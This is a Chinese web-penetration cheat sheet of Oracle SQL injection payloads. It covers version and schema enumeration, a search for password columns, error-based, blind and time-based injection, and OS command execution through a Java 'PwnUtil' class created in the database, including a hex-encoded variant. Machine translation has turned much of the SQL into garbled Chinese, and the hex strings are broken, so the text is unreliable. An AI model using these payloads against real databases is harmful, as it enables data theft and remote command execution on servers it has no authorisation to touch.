WEB渗透Web突破篇，web渗透技术及实战案例解析

版本

SELECT 用户FROM 双UNION SELECT * FROM v$version

数据库名

从全局名称中选择一个全局名称。

从V$DATABASE 中选择一个名称。

从V$INSTANCE 中选择实例名称。

从Dual 中选择SYS.DATABASE_NAME。

列库

从all_tables 中选择不同的所有者；

列表

从所有表中选择表名。

SELECT 所有者、表名FROM all_tables；

SELECT 所有者，表名FROM 所有选项卡列WHERE 列名LIKE \’%PASS%\’;

列字段

SELECT 列名FROM 所有选项卡列WHERE 表名=\’well\’;

SELECT 列名FROM all_tab_columns WHERE 表名=\’blah\’ 且所有者=\’foo\’;

基于报错注入

非法HTTP 请求执行说明SELECT utl_inaddr.get_host_name((select Banner from v$version where rownum=1)) FROM DualCTXSYS.DRITHSX.SNSELECT CTXSYS.DRITHSX.SN(user,(select Banner from v$version where rownum=1) ) )) FROM 双无效XMLSELECT rtrim(extract(xmlagg(xmlelement(\’s\’, usernameSQL ErrorSELECT NVL(CAST(LENGTH(USERNAME) AS VARCHAR(4000)))),CHR(32)) FROM (SELECT USERNAME,ROWNUM AS LIMIT)来自SYS.ALL_USERS) WHERE LIMIT=1))

盲注

说明执行版本12.2SELECT COUNT(*) FROM v$version WHERE Banner LIKE \’Oracle%12.2%\’;Enable Subselect SELECT 1 FROM Dual WHERE 1=(SELECT 1 FROM Dual) 表log_table 存在SELECT 1 FROM Dual WHERE 1=(SELECT 1 from log_table); log_table 中存在字段信息SELEC COUNT(*) FROM user_tab_cols WHERE column_name=\’MESSAGE\’ AND table_name=\’LOG_TABLE\’; 第一个字符是tSELEC message FROM log_table WHERE rownum=1 AND message LIKE \’t%\’;

时间注入

AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE(\'[RANDSTR]\’,[SLEEPTIME]) 注释符号– /**/

命令执行

/* 创建一个Java类*/

开始

立即执行创建或替换名为\’PwnUtil\’ 的Java 源文件import java.io.* 并编译它public class PwnUtil{ public static String runCmd(String args){ try{ BufferedReader myReader=new BufferedReader(new InputStreamReader( Runtime.getRuntime( ) ) .exec(args).getInputStream()));String stemp, str=\’\’;while ((stemp=myReader.readLine()) !=null) str +=stemp + \’\\n\’;return str;} catch (Exception e){ return e.toString();}} public static String readFile(String filename){ try{ BufferedReader myReader=new BufferedReader(new FileReader(filename));String stemp, str=\’ \’;while((stemp=myReader.readLine()) !=null) str +=stemp + \’\\n\’;myReader.close();return str;} catch (Exception e){ return e .toString() ; }}};\’;

结尾；

/

开始

EXECUTE IMMEDIATE \’创建或替换函数PwnUtilFunc(varchar2 中的p_cmd) 将varchar2 返回为语言Java 名称\’\’PwnUtil.runCmd(java.lang.String) return String\’\’;\’;

结尾；

/

/* 执行系统命令*/

从Dual 中选择PwnUtilFunc(\’ping -c 4 localhost\’);

或（十六进制）

/* 创建一个Java类*/

SELECT TO_CHAR(dbms_xmlquery.getxml(\’声明PRAGMA AUTONOMOUS_TRANSACTION; 立即开始执行utl_raw.cast_to_varchar2(hextoraw(\’\’637265617465206f72207265706c61636520616e6420636f6d70696c652 0. 7 6e7574696c7b7075626c69632073746174696320537472696e672072 756e28537472696e672061726773297b7472797b427566665726564526561 452 7 20 164 3b 7d7d7d\’\’));

立即执行utl_raw.cast_to_varchar2(hextoraw(\’\’637265617465206f72207265706c6163652066756e6374696f6e2050776e5574696c46756e6328705f636d6420696 e 207 66 1726368617232292072657475726e207661726368617232206173206c616e6775616765206a617661206e616d65202770776e7574696c2e72756 e28 7 6612e6c616e672e537472696e67292072657475726e20537472696e67273b\’\’)) 结束；\’)) 对偶的结果

/* 执行系统命令*/

从Dual 中选择PwnUtilFunc(\’ping -c 4 localhost\’);

以上#WEB渗透和Web突破的相关内容来自互联网，仅供大家参考。相关信息请参见官方公告。